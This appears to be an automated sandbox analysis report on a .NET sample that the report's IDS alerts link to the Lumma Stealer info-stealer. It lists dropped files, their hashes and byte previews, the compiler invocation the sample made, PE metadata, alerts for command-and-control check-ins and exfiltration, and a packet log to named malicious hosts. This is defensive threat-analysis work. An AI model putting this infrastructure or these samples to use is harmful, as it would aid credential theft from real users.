SHA1:	17C02D04062EA715E979514B770EF0144F969206
SHA-256:	85C259AB97D80AD022A97D6C3815C56C70E9442BE1C2C1D229E3449B53E0BC9A
SHA-512:	0CE2CAD376639E8F294934F33616AB7F488FA0A171E0D9F4DEF9CE11CA09F49CABB9FACA995EE106E35908BF370B3E68EB63218108BECCD760D1DB1F4BEC8785
Malicious:	true
Reputation:	low
Preview:	./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.0.cs"

C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	8704
Entropy (8bit):	4.660946452556037
Encrypted:	false
SSDEEP:	96:IbuaQZGQf9xPQ2pCa/u67hHJq9IhbpPrjzKcaEZR2H0ljILHqrv5Mq6TzeNc+iEK:ICaQHf9WDa/u6HRj2ca1Uxd5MqseNcJ
MD5:	AFD80D901C7D82A5C49C96D546B4C861
SHA1:	145D76272E3400372F0387932A57E3CAB5D71742
SHA-256:	F6910122E05FD54182F291D972AE9B5C71F8E74DA7FAB7DCB6BE2F7684702734
SHA-512:	1C69B0DD8C1AD3ECC30FF07519629DD1D369BD25E94FD986BCC7845F32D5A0647CCE141E13B106159766140CAC8A23C3AF0354DE0FF998D10F6211D1391CD5EB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(...."..(......(.......0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p.....(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......

C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.out

Download File

Process:	C:\Users\user\Desktop\TZ33WZy6QL.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	699
Entropy (8bit):	5.227381090947233
Encrypted:	false
SSDEEP:	12:Km/qR37L/6KbwZWuGUwZWuaKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:K8qdn6KbwZWewZWpKax5DqBVKVrdFAMb
MD5:	B8F9191D617AE6BC760F7CAF4FEA62F4
SHA1:	B3B3A7152637D7924BEAD9533CE45494311421B7
SHA-256:	BEC97BB4822A41C403FC0ABAC0EF1ACEF9212AAF95C2E0A5E19390CEF0FD7BDD
SHA-512:	7744085146D8B6FF7315ED68DF58E1BCDD4EB18A778A42A66C0FE059CBFB7B7448CEE017B0150689783A3F479CDED6EEF20F9CC210D9C3FB876AC359CEE2D2F2
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\1l2s0ln0\CSC85B0E78DF15C46CA993256ECF87E3F19.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0704616004794314
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryReak7Ynqqg/PN5Dlq5J:+RI+ycuZhNCakSKPNnqX
MD5:	382B80BDCA602DAA7A6E0716B64B2EF2
SHA1:	16226B770B80EFF8185CDC3E72A44C4D6CBEBB66
SHA-256:	327CB4B731FC07A8657F8E97BBE8CC52477CF8E051BFA358F0F7F37A31AD6CBF
SHA-512:	829DBC0BB8A2CAE247D9D1D7BACA49E2D0D548A18A88403A45409F46F1B9988828765C4F0222D0F051010C5D9885577CDA29F42CCBB0A00CF804EA79B6C5F181
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.l.2.s.0.l.n.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.l.2.s.0.l.n.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\RES2A5B.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Nov 8 12:26:41 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.950432217548341
Encrypted:	false
SSDEEP:	24:HNe9EujwZP2FSuBwZHLwKLmfwI+ycuZhNCakSKPNnqSqd:EjwZP2pBwZcKLmo1ulCa3mqSK
MD5:	C4AFE674FC9E28A18253D3ECF8B87545
SHA1:	17EA2831AAEB9D0E4A1AE2D7D0C16F1F600B3851
SHA-256:	586E09D7FDA598067CA2026E07BE40871E280DB78C48DCEFBBC9AFC495BFC646
SHA-512:	F2E62D21E1E3EBAC82AC7B11EE311FAAA2A9F8A857DB788957C2DA07EB64EA2F1A9ADFC44FDC952A4BC63E64FA63CDDB180331FC48AEE6F0A830B1CEB1FF51E4
Malicious:	false
Preview:	L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\1l2s0ln0\CSC85B0E78DF15C46CA993256ECF87E3F19.TMP................8+...`-.zn...K............3.......C:\Users\user\AppData\Local\Temp\RES2A5B.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.l.2.s.0.l.n.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	3.896348217262377
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	TZ33WZy6QL.exe
File size:	45'056 bytes
MD5:	aa167e9969d9b0dc9a2f2936bd397f31
SHA1:	80f2c9019c64111a16576ceafb99add5cfacbad7
SHA256:	af626d15eb3b97487bd43c2a0ff5ea78993c35a522f81cb708abcfd1b088f0d1
SHA512:	1817729af4f7b0db51180b12140272736843d9b73758641030b6e6582a820e0fb8d7da9c0936c43db55d9f8056b1d685142f4c280fdf3db8b36a43633e841e57
SSDEEP:	768:yFtchgNSVwafevGHkiV++I1gqDnJuuAuznQVLNvxu0BvkwIt6BcN4febq:yFtggN7aeGEk+11Tu9AnQVLNppvk9RNw
TLSH:	B213595171FE9029D5BBEBB5BEDDACEDD89E5971182C246700C1928B4B21FE0EA43C34
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>............"...0.............j.... ........@.. ....................... ............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x40c36a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x939D3E11 [Tue Jun 23 20:09:53 2048 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc318	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe000	0x610	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xc2fc	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa370	0xa400	866d67b5e8e240b5dd6e459774b674ba	False	0.2405201981707317	data	3.910781024638201	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xe000	0x610	0x800	92aaf4a55736a28d9c609716b869d82d	False	0.31884765625	data	3.4591587823885317	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10000	0xc	0x200	4bb8e39b7134c57236ea10a8dfe65823	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xe090	0x380	data			0.39285714285714285
RT_MANIFEST	0xe420	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-08T12:02:30.037683+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.9	49717	147.45.44.131	80	TCP
2024-11-08T12:02:32.509783+0100	2057284	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (knifedxejsu .cyou)	1	192.168.2.9	63293	1.1.1.1	53	UDP
2024-11-08T12:02:33.173108+0100	2057285	ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)	1	192.168.2.9	49738	172.67.187.9	443	TCP
2024-11-08T12:02:33.173108+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49738	172.67.187.9	443	TCP
2024-11-08T12:02:33.925723+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.9	49738	172.67.187.9	443	TCP
2024-11-08T12:02:33.925723+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.9	49738	172.67.187.9	443	TCP
2024-11-08T12:02:34.864321+0100	2057285	ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)	1	192.168.2.9	49749	172.67.187.9	443	TCP
2024-11-08T12:02:34.864321+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49749	172.67.187.9	443	TCP
2024-11-08T12:02:35.353808+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.9	49749	172.67.187.9	443	TCP
2024-11-08T12:02:35.353808+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.9	49749	172.67.187.9	443	TCP
2024-11-08T12:02:36.107812+0100	2057285	ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)	1	192.168.2.9	49755	172.67.187.9	443	TCP
2024-11-08T12:02:36.107812+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49755	172.67.187.9	443	TCP
2024-11-08T12:02:37.547069+0100	2057285	ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)	1	192.168.2.9	49766	172.67.187.9	443	TCP
2024-11-08T12:02:37.547069+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49766	172.67.187.9	443	TCP
2024-11-08T12:02:38.773732+0100	2057285	ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)	1	192.168.2.9	49772	172.67.187.9	443	TCP
2024-11-08T12:02:38.773732+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49772	172.67.187.9	443	TCP
2024-11-08T12:02:41.273657+0100	2057285	ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)	1	192.168.2.9	49788	172.67.187.9	443	TCP
2024-11-08T12:02:41.273657+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49788	172.67.187.9	443	TCP
2024-11-08T12:02:42.666705+0100	2057285	ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)	1	192.168.2.9	49794	172.67.187.9	443	TCP
2024-11-08T12:02:42.666705+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49794	172.67.187.9	443	TCP
2024-11-08T12:02:43.937994+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.9	49794	172.67.187.9	443	TCP
2024-11-08T12:02:44.498002+0100	2057285	ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)	1	192.168.2.9	49805	172.67.187.9	443	TCP
2024-11-08T12:02:44.498002+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49805	172.67.187.9	443	TCP
2024-11-08T12:02:47.244723+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.9	49816	TCP
2024-11-08T12:03:25.590514+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.9	49983	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 8, 2024 12:02:29.189327002 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:29.194087029 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:29.194159985 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:29.194366932 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:29.199701071 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.037547112 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.037574053 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.037587881 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.037600040 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.037612915 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.037683010 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.037683010 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.037725925 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.037735939 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.037746906 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.037761927 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.037771940 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.037774086 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.037791014 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.037878036 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.042660952 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.042679071 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.042690992 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.042768002 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.091350079 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.158713102 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.158735037 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.158752918 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.158766031 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.158776999 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.158843994 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.159070969 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.159081936 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.159092903 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.159127951 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.159167051 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.159204960 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.159218073 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.159267902 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.159944057 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.160120010 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.160178900 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.277503967 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.277519941 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.277534008 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.277545929 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.277578115 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.277611971 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.277647018 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.277659893 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.277672052 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.277729988 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.278058052 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.278069973 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.278080940 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.278094053 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.278110027 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.278110027 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.278631926 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.278683901 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.278697014 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.280184031 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.280194998 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.280313969 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.325726986 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.396193027 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.396236897 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.396285057 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.396306038 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.396370888 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.396405935 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.396415949 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.396440029 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.396476030 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.396512985 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.396522999 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.396549940 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.397367001 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.397397995 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.397428989 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.397445917 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.397454977 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.397743940 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.397769928 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.397773981 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.397825003 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.440347910 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.440361023 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.440445900 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.514785051 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.514803886 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.514816999 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.514831066 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.514851093 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.514897108 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.514925003 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.515177965 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.515192032 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.515208006 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.515235901 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.515271902 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.515301943 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.515322924 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.515387058 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.515914917 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.515928030 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.515938997 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.515969992 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.560069084 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.600162983 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.600229979 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.600270033 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.600296021 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.600399017 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.600451946 CET	49717	80	192.168.2.9	147.45.44.131
Nov 8, 2024 12:02:30.633546114 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.633676052 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.633687973 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.633698940 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.633709908 CET	80	49717	147.45.44.131	192.168.2.9
Nov 8, 2024 12:02:30.633723021 CET	80	49717	147.45.44.131	192.168.2.9
